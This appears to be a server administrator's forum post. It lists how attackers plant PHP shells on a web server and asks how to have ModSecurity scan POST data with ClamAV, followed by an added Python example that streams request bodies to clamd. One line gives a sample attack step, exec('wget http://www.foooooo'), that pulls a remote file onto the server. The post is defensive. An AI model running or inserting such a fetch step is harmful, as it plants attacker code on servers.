Dear all, you all know about the new methods of attack like PHP shell code,
and the old methods like iframe attacks.
I did scan all uploaded files via pure-ftp, cPanel Uploader, and PHP upload.

But what if the attacker opens a PHP editor, puts the virus code in the
editor, and hits submit? The code will be stored on the server, with no sound :)
I know that if I scan the server I will have a report about it, but the bad
news is that the hacker will attack and do his job, and then I will see "Oh, there
is a hacking file here".


I think that we have 5 ways to place a file on the server.

1- FTP
2- Upload via cPanel
3- PHP Uploader
4- Write the virus code to the file via "cPanel / PHP editor"
5- Get the virus file via an HTTP request by PHP "file_get_contents(),
exec('wget http://www.foooooo')", or via cURL

The most common ways are 1, 2 and 3.
But I noticed on my server that the hacker keeps getting smarter.
He started using method "4" and I am sure he will move to method 5.

So what do you think about that? I know that there is a program named
"ModSecurity" and I can scan the POST, but how can I tell ModSecurity to
use ClamAV? That is what I don't know. There is a method to scan the uploaded
file by ModSecurity, but that is not my goal; I need to scan the POST
data, not the POST uploaded files.
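
For the case raised above (scanning raw POST data rather than an uploaded file), the following is an added example, not part of the original post: it streams a request body to the clamd daemon with its INSTREAM command, so nothing has to be written to disk first. The function names are hypothetical, the socket path is an assumed default that varies by distribution, and how the body is obtained from the web server or ModSecurity is not covered.

```python
import socket
import struct

CHUNK = 64 * 1024  # chunk size; total must stay under clamd's StreamMaxLength


def instream_frames(body: bytes, chunk: int = CHUNK) -> bytes:
    """Frame raw POST data for clamd's INSTREAM command."""
    out = [b"zINSTREAM\0"]  # 'z' prefix: null-terminated command and reply
    for i in range(0, len(body), chunk):
        part = body[i:i + chunk]
        # each chunk: 4-byte big-endian length, then the data
        out.append(struct.pack("!I", len(part)) + part)
    out.append(struct.pack("!I", 0))  # zero-length chunk ends the stream
    return b"".join(out)


def parse_reply(reply: bytes):
    """Return (infected, signature) from a clamd reply; raise on errors."""
    text = reply.rstrip(b"\0\n").decode("utf-8", "replace")
    _, _, verdict = text.partition(": ")
    if verdict == "OK":
        return False, None
    if verdict.endswith(" FOUND"):
        return True, verdict[:-len(" FOUND")]
    # e.g. size limit exceeded: fail closed instead of treating it as clean
    raise RuntimeError("clamd error: " + text)


def scan_post_body(body: bytes, path: str = "/var/run/clamav/clamd.ctl"):
    """Send a request body to a local clamd (socket path is an assumption)."""
    with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
        s.settimeout(10)
        s.connect(path)
        s.sendall(instream_frames(body))
        reply = b""
        while not reply.endswith(b"\0"):
            data = s.recv(4096)
            if not data:
                break
            reply += data
    return parse_reply(reply)
```

A caller would reject or log the request when `scan_post_body()` returns `(True, name)` and should also treat the raised error as a failed scan.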